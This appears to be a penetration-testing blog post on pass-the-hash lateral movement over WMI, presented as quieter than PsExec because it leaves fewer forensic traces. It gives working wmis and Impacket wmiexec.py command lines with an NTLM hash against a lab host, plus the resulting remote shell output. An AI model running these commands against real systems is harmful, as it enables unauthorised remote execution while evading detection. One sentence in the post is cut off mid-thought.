PSEXEC has been a staple for Windows post exploitation pivoting and system administration for a long while. The basic premise of how all “psexec” tools work is:
- (Optional) Upload a service executable (PSEXECSVC.EXE in the case of SysInternal’s tool) to the ADMIN$ share
- Connect to the service manager on the remote host, and create a service based on either a local (to the remote system) executable or the uploaded one.
- Run the service
- Stop and delete the service and uploaded file pulling down the resulting output if any from the execution.
Now, as you can guess, the uploading of a file, creating, starting, stopping, and deletion of services create quite the logs and forensic evidence.
As you might imagine, thats not the best thing for us on the offensive side of infosec. Luckily big brother Microsoft provides another option, WMI (Windows Management Interface). I demonstrated the use of this in the past: HERE and HERE
The downside to using the WMIC directly is that you need a valid token or a valid password for it to work. Passing the hash didn’t used to be an available option.
That has changed with the “wmis” package on Kali Linux that incorporates the “Pass-the-Hash for 15 years toolkit”
(There is a slight problem where you have to play with it a bit to get it working on 64 bit Kali)
- Installing it on a random VPS is dead simple and doesn’t need the Kali repos to get right, nor Debian/Ubuntu.
- It defaults to an “semi-interactive shell” which writes and reads output from the ADMIN$ shell by default. Something I would normally have to do manually with a bunch of tools
- As with the WMIS package, it allows you to just create a process without the ADMIN$ write/read.
Enough crazy talk here is an example usage of each:
root@wpad:~# wmis Usage: [-?NPV] [-?|--help] [--usage] [-d|--debuglevel=DEBUGLEVEL] [--debug-stderr] [-s|--configfile=CONFIGFILE] [--option=name=value] [-l|--log-basename=LOGFILEBASE] [--leak-report] [--leak-report-full] [-R|--name-resolve=NAME-RESOLVE-ORDER] [-O|--socket-options=SOCKETOPTIONS] [-n|--netbiosname=NETBIOSNAME] [-W|--workgroup=WORKGROUP] [--realm=REALM] [-i|--scope=SCOPE] [-m|--maxprotocol=MAXPROTOCOL] [-U|--user=[DOMAIN\]USERNAME[%PASSWORD]] [-N|--no-pass] [--password=STRING] [-A|--authentication-file=FILE] [-S|--signing=on|off|required] [-P|--machine-pass] [--simple-bind-dn=STRING] [-k|--kerberos=STRING] [--use-security-mechanisms=STRING] [-V|--version] //host Example: wmis -U [domain/]adminuser%password //host cmd.exe /c dir c:\ > c:\windows\temp\output.txt
root@wpad:~# wmis -U administrator%aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 //172.16.102.141 calc.exe HASH PASS: Substituting user supplied NTLM HASH... HASH PASS: Substituting user supplied NTLM HASH... [wmi/wmis.c:172:main()] 1: calc.exe NTSTATUS: NT_STATUS_OK - Success
Using a password, but with hashes you just tell it
root@wpad:~/impacket/examples# ./wmiexec.py Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-hashes LMHASH:NTHASH] target [command [command ...]] positional arguments: target [domain/][username[:password]@]<address> command command to execute at the target. If empty it will launch a semi-interactive shell optional arguments: -h, --help show this help message and exit -share SHARE share where the output will be grabbed from (default C$) -nooutput whether or not to print the output (no SMB connection created) authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH
root@wpad:~/impacket/examples# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29 email@example.com Impacket v0.9.12-dev - Copyright 2002-2014 Core Security Technologies SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute C:\>dir Volume in drive C has no label. Volume Serial Number is 5CCA-B528 Directory of C:\ 07/13/2009 11:20 PM <DIR> PerfLogs 10/07/2013 03:26 PM <DIR> Program Files 07/14/2009 01:08 AM <DIR> Program Files (x86) 04/25/2014 02:21 AM <DIR> Users 05/11/2014 03:39 PM <DIR> Windows 0 File(s) 0 bytes 5 Dir(s) 52,884,389,888 bytes free C:\>